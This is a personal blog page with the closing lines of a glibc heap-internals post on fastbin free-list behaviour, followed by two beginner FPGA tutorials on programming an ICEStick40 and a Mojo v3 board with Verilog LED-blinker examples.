<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEV09pTg5e5CfDHoevyKWDda_6zNNO6vRQFYkf4aX0qS9v3z_Xbx22F5E5ybwmYDfVuuKuNuR1wUS17kC5LNc80bOyk_Ah0QV6oAbeM2wL3K97UrQzz3D97QVHxqgq7vRi3vowEW1u7Tc/s1600/fake_fastbin_pointer_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="1500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEV09pTg5e5CfDHoevyKWDda_6zNNO6vRQFYkf4aX0qS9v3z_Xbx22F5E5ybwmYDfVuuKuNuR1wUS17kC5LNc80bOyk_Ah0QV6oAbeM2wL3K97UrQzz3D97QVHxqgq7vRi3vowEW1u7Tc/s1600/fake_fastbin_pointer_2.png" /></a></div>
<br />
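Pretty interesting! The field that gets popped out is none other than the chunk's <span style="font-family: "courier new" , "courier" , monospace;">fd</span> pointer (<span style="font-family: "courier new" , "courier" , monospace;">mchunk->fd</span>), which points to the next free chunk in the same fastbin. So we now know that when a chunk is handed out from a fastbin, its fd pointer is written into the <span style="font-family: "courier new" , "courier" , monospace;">fastbinsY</span> slot, making the next free chunk the new head of that bin. Right now I can't really see a useful way to abuse this; it just opens up some behavior that may be useful later.<br />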
<br />
That's it for this one. The next post will cover the heap life cycle: which functions actually get called when the heap is set up and torn down behind the scenes.</div>
<h2 style="text-align: left;">
References and Reading</h2>
<br />
<ol style="text-align: left;">
<li><a href="https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_state.html">https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_state.html</a> </li>
<li><a href="http://core-analyzer.sourceforge.net/index_files/Page335.html">http://core-analyzer.sourceforge.net/index_files/Page335.html</a> </li>
<li><a href="https://articles.forensicfocus.com/2017/10/16/linux-memory-forensics-dissecting-the-user-space-process-heap/">https://articles.forensicfocus.com/2017/10/16/linux-memory-forensics-dissecting-the-user-space-process-heap/</a> </li>
<li>Heap Consistency Checking (GNU.org) <a href="https://www.gnu.org/software/libc/manual/html_node/Heap-Consistency-Checking.html#Heap-Consistency-Checking">https://www.gnu.org/software/libc/manual/html_node/Heap-Consistency-Checking.html#Heap-Consistency-Checking</a> </li>
<li><a href="https://stackoverflow.com/questions/1665419/do-threads-have-a-distinct-heap">https://stackoverflow.com/questions/1665419/do-threads-have-a-distinct-heap</a> </li>
</ol>
<br />
<br />
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-61286997383096200742019-03-06T18:19:00.002-08:002021-03-20T02:31:14.333-07:00[FPGAs] Introduction to the ICEStick40<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHRE-dxpP7AmFqpHMqnzmN8wCPQEObAF4CLGg2Zqc4Wj0ZlbiJ9cihv8QnR0Geogu7unejH9bgNduVyi1O78lzwL9pPCqepneUwJkFjqC2yEWHhtaZnElDl80cW1qGbaVA8uemsLn_TQ0/s1600/icestick_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="719" data-original-width="746" height="385" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHRE-dxpP7AmFqpHMqnzmN8wCPQEObAF4CLGg2Zqc4Wj0ZlbiJ9cihv8QnR0Geogu7unejH9bgNduVyi1O78lzwL9pPCqepneUwJkFjqC2yEWHhtaZnElDl80cW1qGbaVA8uemsLn_TQ0/s400/icestick_2.png" width="400" /></a></div>
<br />
FPGAs are arguably the best way to get into hardware reverse engineering, for many reasons. The most obvious one to me is the experience in what I've come to term "raw clockiness" (<i>or the practice of making a real hardware-backed clock do exactly what you want</i>). There is a certain romanticism of freshly broken set theory and deep repressed proof theory sins that comes to bear for me when I'm exposed to this kind of computing. All other kinds tend to veil this shaky, sometimes deeply COUNTER-intuitive means of problem solving :)<br />
<br />
Basically, what I mean to say is that if you can get over the hurdle with FPGAs (<i>which is not a big deal at all if you know basic set theory</i>), you'll have mastered many things that repeatedly form the basis of the problems you'll need to solve when reverse engineering hardware, questions like:<br />
<br />
<ul style="text-align: left;">
<li><b>What is this thing doing with that oscillator? What on earth can it possibly be doing?</b> <i>There are only so many combinatorial things that can happen given the context and the components / traces handling a signal or input; the more experience you have with raw signal programming, the better you get to know these limitations and nuances. They are the most important rules of the game a lot of the time.</i> </li>
<li><b>Which one of these input/output signals is the clock / data etc., based on what components are doing with it in context?</b> <i>It's like trying to infer the type of a function argument in assembly from its place in other functions and contexts.</i> </li>
<li><b>How does this thing receive its programming or settings? From where? How often?</b> <i>FPGAs are often volatile: they don't "store" their programming forever, so it has to be reloaded every time they power up. Programming is usually done from a flash chip, a micro-controller, or really anything that can squawk a bitstream into the chip. </i></li>
<li><b>OMG is that an FPGA on the board?</b> <i>Sometimes things you are trying to identify can literally just straight up be FPGAs hehe</i></li>
</ul>
<br />
Anyway, enough philosophical waxing (<i>jokes, everything is a kind of soft philosophy to me now</i>); let's get into a quick example with the ICEStick. The reason I really like this project is that it's completely open source, and you can get the ICEStick for super cheap on Amazon and various other places, so it's super easy to get started! All you need to do is download a couple of things, write a Makefile and start pumping out bitstreams that do awesome things. In this post I'll cover everything you need to get that going.<br />
<br />
<h3>
Basic Workflow </h3>
Here are the basic steps:<br />
<br />
<ol style="text-align: left;">
<li>Write some Verilog modules (<span style="font-family: "courier new" , "courier" , monospace;">*.v</span> files) - <i>obviously any text editor will do, but vi(m) is always the best choice. </i></li>
<li>Define a constraints file for your board (<span style="font-family: "courier new" , "courier" , monospace;">*.pcf</span> files) - <i>this tells the place n' route tool which physical pins and components on the board each signal in your design connects to. You only need to do this once for a given board and set of components. </i></li>
<li>Synthesize the modules into a netlist (<span style="font-family: "courier new" , "courier" , monospace;">*.blif</span> files) - <i>for this we will use <span style="font-family: "courier new" , "courier" , monospace;">yosys</span></i></li>
<li>Place n' route the netlist (<span style="font-family: "courier new" , "courier" , monospace;">*.txt</span> files) - <i>our place n' route tool here will be arachne-pnr (pnr stands for "place n route")</i></li>
<li>Pack the placed design into a bitstream (<span style="font-family: "courier new" , "courier" , monospace;">*.bin</span> files) - <i>with <span style="font-family: "courier new" , "courier" , monospace;">icepack</span></i></li>
<li>Program/flash the FPGA board with iceprog</li>
</ol>
<h3 style="text-align: left;">
Preparing the Environment</h3>
You need to grab a couple of tools to get this all set up (most of the posts I link below mention other steps for various platforms). For this one I'm sticking to a simple Ubuntu 18.04 LTS machine with nothing fancy installed except git. All you need to do is download a couple of repositories and make + install them.<br />
<ol style="text-align: left;">
<li>install / make dependencies</li>
<li>install / make yosys, arachne-pnr, iceprog</li>
<li>Test build</li>
</ol>
I've whipped up a simple script that does all this for you, available as a gist:<br />
<br />
<br />
<script src="https://gist.github.com/k3170makan/bd2bb317eb7f132bea7ed1b87cafe9d1.js"></script>
All you need to do is run this and it should sort everything out. It could take a couple of minutes.<br />
Once that's all done, make yourself a test folder and stick this convenient Makefile in there:<br />
<br />
<script src="https://gist.github.com/k3170makan/9444e44fb0d648506d9469b0dd068994.js"></script>
To use the Makefile you simply do the following:<br />
<ol style="text-align: left;">
<li>Replace the <span style="font-family: "courier new" , "courier" , monospace;">VER</span> variable with the name of the Verilog module you'd like to synthesize.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">make</span> (<i>make everything</i>).</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">make prog</span> (<i>program the most recent bitstream</i>).</li>
</ol>
The last thing you need to do before writing some Verilog is define a constraints file (*.pcf). You might notice that the tools we use here are not specific to a particular board; they support a range of them. So to make sure (<i>when you synthesize a bitstream</i>) that you're targeting the right board, you need to state the pin assignments for the I/O pins, clocks and other goodies on the board you'd like the FPGA to interact with. Here's what the ICEStick40's .pcf file looks like:<br />
<br />
<script src="https://gist.github.com/k3170makan/c9451c3f4b3441c0b2306189ef526202.js"></script>
<br />
<h3 style="text-align: left;">
LED Blinker with ICEStick40</h3>
<br />
Once you've got everything up and running, you'll be able to whip up a simple LED Blinker like so:<br />
<br />
<script src="https://gist.github.com/k3170makan/e45447f4da043b3690020f1e0dd88790.js"></script>
The good thing here is that this works pretty much like any other LED blink counter: it just maps some reg's to the LEDs and flips them on and off using a clock pre-scaler that slows the 12 MHz board clock down to a rate you can actually see (using a 21 bit reg array). If you're confused about these words it's totally cool, I have some blog posts on the way that explain how they work in full. For now, just make sure you can get your environment working; understanding the code is a workable problem, but only once you can actually hit the FPGA with the right stuff.<br />
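If you'd like something to compare the gist against, here's a minimal sketch of the same idea (my own, not the code in the gist). It assumes the ICEStick's 12 MHz on-board clock, and the port names clk and led are assumptions that would need to match whatever your .pcf calls those pins. Instead of tapping one bit of a free-running counter (which can only divide the clock by a power of two; the top bit of a 21 bit counter, for example, completes one on/off cycle every 2^21 ticks, roughly 5.7 times a second at 12 MHz), it counts up to a chosen value, so the LED toggles every 6,000,000 ticks (0.5 s) and blinks at 1 Hz:<br />

```verilog
// Hypothetical 1 Hz blinker sketch; assumes a 12 MHz input clock (ICEStick).
// Port names are illustrative and must match the names used in your .pcf.
module blinky_1hz #(
    parameter integer HALF_PERIOD = 6_000_000  // clock ticks per LED toggle (0.5 s at 12 MHz)
) (
    input  wire clk,   // board clock
    output reg  led    // LED output
);
    // 23 bits is enough to count up to 5,999,999 (2^23 = 8,388,608).
    reg [22:0] count = 23'd0;

    initial led = 1'b0;

    always @(posedge clk) begin
        if (count == HALF_PERIOD - 1) begin
            count <= 23'd0;   // wrap the counter around...
            led   <= ~led;    // ...and flip the LED
        end else begin
            count <= count + 23'd1;
        end
    end
endmodule
```

Counting to an exact value costs a comparator on top of the counter, but it lets you hit blink rates that aren't a power-of-two fraction of the clock; for quick experiments, just tapping a counter bit is simpler.<br />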
<br />
If you compile this using my Makefile (or not), you should see something like the following output (<i>luckily, because yosys and the pnr tools are pretty verbose, you will be able to trace quite a bit of activity if things are going funky</i>):<br />
<br />
<script src="https://gist.github.com/k3170makan/40eae7580a1f5630a53d882002597639.js"></script>
<br />
The last step is actually programming the FPGA with the bitstream we just generated; here's what the output should look like:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">>sudo make prog</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">iceprog example.bin </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">init..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cdone: high</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">reset..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cdone: low</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">flash ID: 0x20 0xBA 0x16 0x10 0x00 0x00 0x23 0x64 0x34 0x65 0x04 0x00 0x22 0x00 0x32 0x27 0x12 0x16 0xFE 0x6A</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">file size: 32220</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">erase 64kB sector at 0x000000..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">programming..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">reading..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">VERIFY OK</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cdone: high</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Bye.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilLESxUUVYLgJLuBOgEpgmeFvqNhP2rdpyvGVutUFhlmEZrUwO3pHfTJovNQch77q9yRLxP_ky9cALcDZlncvO9XGVmIuC07zP6DSEeLJhag2IZ-pA6ShF9NAuPJ8qbAxT6ESZseRJlM4/s1600/ezgif.com-video-to-gif.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="338" data-original-width="600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilLESxUUVYLgJLuBOgEpgmeFvqNhP2rdpyvGVutUFhlmEZrUwO3pHfTJovNQch77q9yRLxP_ky9cALcDZlncvO9XGVmIuC07zP6DSEeLJhag2IZ-pA6ShF9NAuPJ8qbAxT6ESZseRJlM4/s640/ezgif.com-video-to-gif.gif" width="640" /></a></div>
<br />
<br />
That's it for this one, folks.<br />
<h3 style="text-align: left;">
<br />References and Reading</h3>
<ol style="text-align: left;">
<li><a href="https://appcodelabs.com/getting-started-with-lattice-icestick-using-open-source-tools-on-macos-linux">https://appcodelabs.com/getting-started-with-lattice-icestick-using-open-source-tools-on-macos-linux</a></li>
<li>Various ICEStick posts from Hackaday: <a href="https://hackaday.com/tag/icestick/">https://hackaday.com/tag/icestick/</a> </li>
<li><a href="http://www.clifford.at/icestorm/">http://www.clifford.at/icestorm/</a> </li>
</ol>
<br />
<br />
<ul style="text-align: left;">
</ul>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-28697607851018576472019-01-28T16:50:00.001-08:002019-01-28T18:06:04.571-08:00[FPGAs] (Introduction to FPGAs) :: an LED Blinker with Mojo v3<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3jqfIVGiCCvQOe4TOP42-aarnlCGoSJAwztJ2Ds48gQAdkkraXQW8v3iACgDVIJWpYHiYCqZr0mOfjCGF1XjLjNVV6slpRuKJzr1DvqQCx4IXnhfmD1ehvY59aMR2EGRHNhvf2q1nq70/s1600/Screenshot+from+2019-01-28+17-09-26.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="667" data-original-width="772" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3jqfIVGiCCvQOe4TOP42-aarnlCGoSJAwztJ2Ds48gQAdkkraXQW8v3iACgDVIJWpYHiYCqZr0mOfjCGF1XjLjNVV6slpRuKJzr1DvqQCx4IXnhfmD1ehvY59aMR2EGRHNhvf2q1nq70/s1600/Screenshot+from+2019-01-28+17-09-26.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Wiring my board up to an LCD screen on top of a copy of Hegel's Aesthetics. </td></tr>
</tbody></table>
<br />
Hi folks, in this post I'm going to give you as gentle an introduction to FPGA (<i>I will unpack the acronym later</i>) programming as possible, hopefully explaining as much as I know (<i>which is very little up to this point, but enough, I guess, to help some folks</i>), while providing lots of examples and challenges for folks who need ideas to try out that are easy enough to get a foothold on.<br />
<br />
If you're familiar with any programming language you should have enough to get going in Verilog; it just requires a bit of re-orientation and practice -<i> just like any language, basically</i> ;)<br />
<br />
To start, let's think about what we are going to do here. FPGAs are pieces of hardware that we can configure. That configuration is done by taking a language we can read and write (<i>Verilog, which plays the role of English/human language here</i>) and converting it into a configuration for the FPGA; this configuration is called a bitstream.<i> A bitstream is essentially the end product of "synthesizing"; it's kind of like putting together a little song for the chip that the computer tweets over lovingly, lulling it into total subservience.</i><br />
<br />
There are many different kinds of FPGAs, so you can play little songs to many different kinds of chips; the tunes get ever wilder, faster and more exciting the more powerful the chips get - <i>I've only programmed like one so far</i>. But have a shop around; there are tons of boards and kits out there that aren't that expensive, and some of them are open source as well! I'm going to use the Mojo v3 in this post though (<i>purely because it's a well-documented board, there's a book out on it as well</i>); I thought it would be an easy way to start. <i>I will definitely cover more open source FPGA tech in future :P. </i><br />
<i><br /></i>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNs4LkyIkUygUYWJXL6XKKsH2GgC4PX3fg4dk5i4m0sn-eGaHfWbhOscagO2EUbsNrbvhL8Pks4cUQ_66PnPKY0tiFCeCgSyt0TzkaisoFpZ8k_oF4mvqKo4Ar8r0bHbjm_K-Kpfrfxo8/s1600/Screenshot+from+2019-01-28+17-09-58.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="597" data-original-width="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNs4LkyIkUygUYWJXL6XKKsH2GgC4PX3fg4dk5i4m0sn-eGaHfWbhOscagO2EUbsNrbvhL8Pks4cUQ_66PnPKY0tiFCeCgSyt0TzkaisoFpZ8k_oF4mvqKo4Ar8r0bHbjm_K-Kpfrfxo8/s1600/Screenshot+from+2019-01-28+17-09-58.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Mojo V3 in a super hipster instagram filter</td></tr>
</tbody></table>
<i><br /></i>
<h2 style="text-align: left;">
What are FPGAs?</h2>
FPGAs (Field Programmable Gate Arrays - <i>see, told'cha</i>) are essentially a grid of (<i>usually thousands of</i>) very, very small configurable circuits. FPGAs let you combine these small configurable circuits so that they behave exactly like (<i>i.e. are functionally equivalent to</i>) a design written in a hardware description language.<br />
<br />
To configure the circuitry I mentioned, you essentially tell the FPGA how to set up each of its different components.<i> The list below might be a ton of information, but it's not super crucial that you understand it; you can program a board fine without knowing any of this, it's just good to know about so you can be a little more aware of what you're doing. </i><br />
<br />
The different components of an FPGA are the following (<i>some manufacturers may differ in many ways</i>):<br />
<br />
<ul style="text-align: left;">
<li><b>Programmable Interconnect Points </b>(PIPs): According to my sources [2], these are basically blocks of circuitry that allow you to route signals between CLBs. </li>
</ul>
<ul style="text-align: left;">
<li><b>Configurable Logic Blocks</b> (CLBs): This component of the FPGA is where most of the magic happens; essentially, the more CLBs an FPGA has, the more data it can store and process. The CLBs have a couple of components to them:</li>
</ul>
<ul style="text-align: left;">
<ul>
<li><b>Flip Flops</b>: these are for responding to clocked events and storing data (<i>I will explain how this happens later</i>). You will essentially orient your programming to leverage these Flip Flops to modify information in response to clock events (when the clock signal goes from low to high or vice versa). <i>This is, I think, why they are called "flip flops": they allow you to flip flop along with the clock lol. </i></li>
<li><b>Internal RAM</b>: for configuring Look-Up Tables (LUTs). These are basically just switch statements of a certain kind: they hold the truth tables for the <i>logic </i>components [2] inside the CLB, mapping every combination of inputs to an output. </li>
<li><b>Multiplexers</b>: These essentially take in multiple input signals and, based on a select signal, pick which one gets passed through to the output, or as one post puts it:</li>
</ul>
</ul>
<blockquote class="tr_bq" style="text-align: left;">
The multiplexer, shortened to “MUX” or “MPX”, is a combinational logic circuit designed to switch one of several input lines through to a single common output line by the application of a control signal. [6]</blockquote>
<ul style="text-align: left;">
<li><b>Configurable I/O Blocks </b>(IO Blocks): These are basically input/output points (or if you like, <i>ports</i>) that allow you to feed signals into the FPGA or push signals out of it. A simple example would be turning on an LED: you need some place to stick the LED 'into' to make it turn on, and the I/O block is where the signal for the LED gets fed from. Please don't stick LEDs directly into the I/O ports on your boards, I'm just making an analogy - <i>I will most likely cover a simple external LED tutorial as well, because it's pretty vital in the journey to more complex external stuff ;)</i>. The I/O blocks have components of their own as well; these essentially allow you to respond to a signal when it makes a certain transition or takes a certain state.</li>
</ul>
<blockquote class="tr_bq" style="text-align: left;">
The high or low state of the signal is called the logic level. If we tell a circuit to respond to an event when an input signal is high, the input is referred to as active high. When we tell it to respond when an input signal is low, guess what, it's called active low! </blockquote>
<div>
Check out [2] in the Reading and References section for cool pictures about it.<br />
<br /></div>
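To make the LUT and multiplexer ideas a bit more concrete, here's a small illustrative sketch in Verilog (the module and signal names are my own). The first module spells out a 2-input XOR as a truth table using a case statement, which is roughly the kind of thing a LUT stores; the second is a 2-to-1 multiplexer, where a select signal picks which input reaches the output. Real LUTs have more inputs (4 on the iCE40, 6 on the Spartan-6 that sits on the Mojo), and it's the synthesis tool, not you, that decides how your logic gets packed into them:<br />

```verilog
// Illustrative only: a 2-input XOR written out as a truth table,
// roughly what a 2-input look-up table (LUT) stores.
module xor_lut (
    input  wire a,
    input  wire b,
    output reg  y
);
    always @(*) begin
        case ({a, b})          // the inputs act as the "address" into the table
            2'b00:   y = 1'b0;
            2'b01:   y = 1'b1;
            2'b10:   y = 1'b1;
            2'b11:   y = 1'b0;
            default: y = 1'b0; // only reachable in simulation (x/z inputs)
        endcase
    end
endmodule

// A 2-to-1 multiplexer: sel chooses which input is passed through to out.
module mux2 (
    input  wire in0,
    input  wire in1,
    input  wire sel,
    output wire out
);
    assign out = sel ? in1 : in0;
endmodule
```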
Anyway, it's basically like play dough for hackers and electrical engineers. They aren't hard to get your head around, but they can be very, very useful when you do! I think getting over the FPGA hill is a very important step in your career as a hacker (<i>just my opinion, let's say</i>).<br />
<br />
<h2 style="text-align: left;">
What you will need</h2>
<div>
<b>DISCLAIMER:</b> The current tutorial involves giving your address to the Xilinx folks (<i>I think this is because of US export laws</i>), which is pretty crappy, for no other reason than that it's private information and it can be mistreated, lost or stolen. So if you're not up for that, please just follow along for interest's sake; I promise I will provide fully open source tutorials as well - no address information bribery required. <br />
<br />
But if you're okay with the Xilinx folks knowing where you live and that you're learning the dangerous sorcery of FPGA hardware, please go download the Xilinx ISE (linked below). </div>
<br />
<ul style="text-align: left;">
<li>Mojo V3 Board available at Amazon [10], SparkFun [9], Alchitry [8] and I'm sure a ton of other places. </li>
<li>Xilinx ISE available at <a href="https://www.xilinx.com/">https://www.xilinx.com/</a> (Sign up for an account and download the ISE)</li>
<li>USB-A to Micro-B cable</li>
<li>Mojo Loader (for loading your program onto the board)</li>
<li>Mojo IDE (provides a different interface for Verilog programming; simpler but less specific than the ISE Verilog IDE). The Mojo IDE also comes with its own hardware description language called Lucid: <a href="https://alchitry.com/pages/lucid">https://alchitry.com/pages/lucid</a> </li>
</ul>
<div>
You will need to install the ISE on whichever platform you like (<i>I suggest using a Linux-based one; it's just way easier and doesn't require a ton of driver drama</i>). For more information on how to get that going, please see the following guide: <a href="https://alchitry.com/pages/installing-ise">https://alchitry.com/pages/installing-ise</a> .</div>
<div>
<br />
<br /></div>
<h2 style="text-align: left;">
Verilog Crash Course</h2>
<div>
<br /></div>
<div>
I'm going to be doing this tutorial in Verilog. Realizing this can be a bit of an obscure language (<i>I agree it is obscure - though not for any super hard to understand reason, to be honest</i>), you might need a bit of a jump start into it if you've never done it before, <i>but don't fret: the whole point of this blog post is to try to explain this to someone who's never done it before</i>. </div>
<div>
<br /></div>
<div>
Let's get to it. Verilog is a hardware description language (HDL), and we call it a register-transfer level (or RTL) language; this wording is meant to describe what Verilog targets with its abstraction, essentially the transfer of signals between hardware-level registers (and other components) [11,12,13,14]. Anyway, once you have everything installed according to the tutorials above, you can start scripting some Verilog for the Mojo.<br />
<br />
Here's what a bare-bones Verilog script looks like:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">module hello_verilog(input clk, output external_led)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> always @ (posedge clk) begin</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> external_led <= clk ^ external_led; </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> end</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">endmodule </span></div>
<div>
<br /></div>
<div>
This is just an example Verilog script to show how elements of the language work. It probably won't achieve anything profound if it were implemented as a real Verilog module on an actual FPGA though (<i>this is because of the frequency of the clock: the LED would flip on every rising edge of a clock running at millions of cycles per second, far too fast for your eyes to see it blink - more on this later</i>). Dealing with that is something I need to cover before I can show you a real Verilog script.<br />
<br />
Anyway, before we unpack that, let's take a look at this script and explain each part.</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">module hello_verilog(input clk, output external_led);</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">...</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">endmodule</span></div>
<div>
<br /></div>
<br />
This is the module header; it declares the inputs and outputs of the module being defined here. The module also needs a matching <span style="font-family: "courier new" , "courier" , monospace;">endmodule </span>at the end.<br />
<br />
These inputs and outputs (<i>and I'm no deep expert here</i>) can essentially be driven by the I/O blocks, depending on what you connect to the module's ports. So if you want to wire in some external device with pins the FPGA board needs to talk to (<i>like a logic analyzer or oscilloscope</i>), these input/output declarations are how you designate them.<br />
<br />
The next section of code I want to get to is this:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">always @ (posedge clk) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">...</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
This is an always block; it defines actions that happen "in tune" with, i.e. in response to, changes in the signals in the <i>sensitivity</i> list in the brackets. Here that means the block runs whenever the clock "clk" (<i>which is for all intents and purposes a square wave - see the example further down</i>) changes from a 0 to a 1. That transition is called a positive edge, or <span style="font-family: "courier new" , "courier" , monospace;">posedge </span>in Verilog (the opposite one, from 1 to 0, is called a <span style="font-family: "courier new" , "courier" , monospace;">negedge</span> or negative edge).<br />
<br />
So, in summary, it says: whenever the clock changes from 0 to 1, always do this stuff. And it closes with an <span style="font-family: "courier new" , "courier" , monospace;">end </span>token (matching the <span style="font-family: "courier new" , "courier" , monospace;">begin</span>), of course.<br />
<br />
Next we have the assignment operation inside the always block:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"> external_led <= clk ^ external_led; </span><br />
<br />
This is called a non-blocking assignment [14]. With this kind of assignment, if there are any other assignments of the same kind ("<=") before or after it, all of their right-hand sides are evaluated first, using the values from before the clock edge, and only then are their left-hand sides updated, so they are effectively all assigned in parallel (<i>see [14] for an excellent explanation of the different pitfalls and always block politics as well</i>).<i> It's kind of like attaching connectors to things from a source: if they are in parallel, the electricity can be expected to be seen running down each connector at the same time</i>. The assignment gives <span style="font-family: "courier new" , "courier" , monospace;">external_led</span> the value of clk xor'd with the current value of external_led. If you think it through, you'll see that this is a way to make it flip on and off, not so? A good exercise is to try and write out the values.<br />
<br />
Okay, so I mentioned this is a non-blocking assignment; does that mean there is another kind? YES! Guess what, it's called a <i>blocking assignment</i>! Here's what it looks like:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">// syntax [left operand] "=" [right operand]</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">external_led = clk ^ external_led;</span><br />
<br />
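A dead plain "=" symbol is used. The way to remember this lies in understanding the header of the kind of always block where this assignment is normally used (the <span style="font-family: "courier new" , "courier" , monospace;">*</span> means "re-run this block whenever any signal it reads changes"); here's a blocking always block:<br />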
<br />
<span style="font-family: "courier new" , "courier" , monospace;">always @ (*) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> external_led = clk ^ external_led</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<br />
These always blocks are for designing combinatorial logic circuits, or logic gates (<i>literally AND, OR, XOR etc. gates</i>); they are great if you need to get really, really low level and build up whatever digital logic you'd like on the FPGA from its basic building blocks.<br />
<br />
To summarize:<br />
<ul style="text-align: left;">
<li><b>blocking</b> <span style="font-family: "courier new" , "courier" , monospace;">= </span>assignments are for <b>combinatorial logic</b> : logic gates, whose outputs depend only on the current inputs. The statements run in order, one after another, just like lines in ordinary code.</li>
<li><b>non-blocking</b><span style="font-family: "courier new" , "courier" , monospace;"> <=</span> for <b>sequential logic</b> : clocked logic with memory (flip-flops/registers), whose outputs depend on the sequence of past inputs. All the right-hand sides are evaluated before any left-hand side is updated.</li>
</ul>
<br />
Anyway, what I'm trying to say is that blocking <span style="font-family: "courier new" , "courier" , monospace;">always</span> blocks are for combinatorial logic, and non-blocking always blocks are for sequential logic, or building registers - these are things that store information for us; we can chain them up in "sequences" and do useful things like building finite state machines! The reason I'm going with a non-blocking always block in the example (<i>and will most probably go with it in the real example too</i>) is that we're describing clocked logic: the LED there is a reg that updates on every clock edge, and we will modulate our clock speed using regs too! <i>You will run into a fair amount of frustration with this concept anyway - so just get used to wading through your problems with it; I don't think it's a completely avoidable mistake hehe.</i><br />
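A classic way to see the difference between the two kinds of assignment is to try swapping two registers. In the sketch below (all names are my own), both pairs get loaded with 0 and 1 while load is high, and after that each clock edge attempts a swap. With non-blocking assignments both right-hand sides are read before either register is updated, so the values really swap; with blocking assignments the first statement overwrites one register before the second statement reads it, so both end up holding the same value. Using blocking assignments in a clocked block like this is exactly what the guideline above tells you not to do; it's only here to show the difference:<br />

```verilog
// Illustrative sketch: "swapping" two registers with non-blocking vs blocking assignments.
module swap_demo (
    input  wire clk,
    input  wire load,          // when high, load known starting values
    output reg  nb_a, nb_b,    // swapped using non-blocking (<=)
    output reg  b_a,  b_b      // "swapped" using blocking (=)
);
    always @(posedge clk) begin
        if (load) begin
            nb_a <= 1'b0;
            nb_b <= 1'b1;
        end else begin
            nb_a <= nb_b;      // both right-hand sides use the old values,
            nb_b <= nb_a;      // so this is a real swap
        end
    end

    always @(posedge clk) begin
        if (load) begin
            b_a = 1'b0;
            b_b = 1'b1;
        end else begin
            b_a = b_b;         // b_a is overwritten immediately...
            b_b = b_a;         // ...so b_b just gets its own old value back
        end
    end
endmodule
```

If you simulate it, the non-blocking pair alternates 01, 10, 01, ... while the blocking pair gets stuck at 11 after the first attempted swap.<br />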
<br />
